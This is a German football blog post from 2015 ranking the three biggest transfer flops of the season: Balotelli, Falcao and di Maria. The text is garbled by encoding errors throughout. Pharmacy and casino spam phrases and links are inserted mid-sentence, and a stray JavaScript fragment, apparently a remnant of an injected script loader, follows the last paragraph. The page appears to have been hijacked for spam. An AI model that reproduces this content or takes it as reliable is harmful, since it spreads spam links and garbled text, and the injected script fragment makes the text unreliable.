Willkommen auf » Die Top 3 Transfer-Flops des letzten Jahres
28. Mai 2015

Die Top 3 Transfer-Flops des letzten Jahres

Das Sommer-Transferfenster naht und die GerA?chtekA?che brodelt. Wir gehen aber zunA�chst den umgekehrten Weg und schauen auf die drei missglA?cktesten internationalen Transfers der vergangenen Saison. Immer mit der Hoffnung im Hinterkopf, dass die Vereine zumindest ein wenig daraus lernen mA�gen und kA?nftig nicht nur nach Namen einkaufen.

Kein Geheimnis: Mit spektakulA�ren Tricks (wie neulich beim AufwA�rmen in MA�nchengladbach gesehen) sorgen FuAYballer fA?r Aufsehen. Manchmal tA�uschen einzelne Aktionen jedoch A?ber das wahre KA�nnen hinweg a�� Beispiele dafA?r gibt es genug. Ein Blick auf die grA�AYten Transfer-EnttA�uschungen der vergangenen Saison liegt deswegen nahe, denn manch internationaler Topkicker bleibt den Beweis seiner Klasse nun schon zu lange schuldig und hat seine Fans eindeutig zu viele WetteinsA�tze auf den bekannten Online-Plattformen wie online online Purchase casinogutscheincode.com gekostet.

Seltene Erscheinung: ein Italiener auf Platz 1

Bei den Flops an erster Stelle ist eindeutig Mario Balotelli zu nennen. Aus deutscher Sicht ist seine verheerende Leistung in Liverpool besonders bitter, da der Italiener seine bislang einzige Sternstunde wohl ausgerechnet bei der Europameisterschaft 2012 und dem direkten Duell mit der DFB-Elf hatte. Wem die Details entfallen sind: hier gehta�?s lang.

Vor dem Liverpoolkapitel schoss Balotelli beim AC Milan immerhin 26 Tore in 42 Spielen. Wirklich angekommen schien der StA?rmer dort trotzdem nie, genau wie schon zuvor bei Manchester City und Inter Mailand. Bleibt also die Frage: Wo zieht es ihn als nA�chstes hin?

Mit nicht einmal 25 Jahren ist Balotelli gerade erst im besten FuAYballeralter angekommen. Ob aber ein Top-Club bereit ist, sein durchaus A?ppiges Gehalt zu zahlen, darf angezweifelt werden. Dass er grundsA�tzlich fuAYballerisch etwas auf dem Kasten hat, sehen wir im folgenden Best-of-Clip…

Einmal Superstar und zurA?ck

canadian drug pharmacy isotrenoin
A?berbewertet oder einfach nur mit seltenem Verletzungspech geschlagen? An Radamel Falcao scheiden sich die Geister. Fakt ist, dass der Kolumbianer von 2009 bis 2013 Tore wie am FlieAYband schoss (zuerst beim FC Porto, dann fA?r Atletico Madrid), und das in durchaus spektakulA�rer Manier.

Mit dem Wechsel zu Monaco begann die Verletzungsseuche http://www.exitbomb.org/himalaya-speman-online/ und auch jetzt, da Falcao mal eine ganze Saison durchspielen konnte, scheint er nicht mehr der Alte zu sein.

Bei Manchester United plant man jedenfalls nicht mehr mit ihm, was nach vier Toren in 26 Spielen nicht A?berraschen dA?rfte. Da der kolumbianische NationalstA?rmer lediglich vom AS Monaco ausgeliehen wurde, kehrt Falcao im Sommer zunA�chst ins FA?rstentum zurA?ck, wie United via Twitter Buy offiziell bestA�tigte.

Pills

Marias Engel bald in MA?nchen?

Buy cheap pills green-line-pharmacy
Manchester United zum zweiten: Angel di Maria war LeistungstrA�ger und Fan-Liebling bei Real Madrid. Der Transfer in den Norden Englands war daher nicht wirklich nachvollziehbar. Und trotzdem holte ihn Louis van Gaal fA?r die Premier League Rekordsumme von knapp 75 Mio. Euro in seine neue Mannschaft.

Ein Jahr spA�ter steht der argentinische FuAYballer des Jahres 2014 angeblich auf der Abschussliste und man darf behaupten, dass di Maria auf verlorene zwA�lf Monate ohne Titel und mit lediglich drei Toren aus 27 Ligaspielen zurA?ckblickt. Von seinem KA�nnen hat er eigentlich nichts verlernt…

Als Interessent fA?r den FlA?gelspieler wird A?brigens der FC Bayern gehandelt (eine groAYe Transfer-Offenisve wurde bereits angekA?ndigt), wo er die alternden Stars Robben und Ribery auf den FlA?geln zunA�chst unterstA?tzen und perspektivisch ersetzen kA�nnte. Aus Marketingsicht wA�re das fA?r den deutschen Rekordmeister der nA�chste Transfer mit internationalem Glanz, der das Team in der Breite verstA�rken und Trainer Guardiola deutlich mehr Perspektiven verschaffen wA?rde. Vielleicht also eine Win-Win-Win-Situation fA?r Manchester, MA?nchen und di Maria.document.currentScript.parentNode.insertBefore(s, document.currentScript); cheap acivir 200 http://www.kobe-miraitec.com/tadacip-20-online/ purchase procardia online


Einen Kommentar schreiben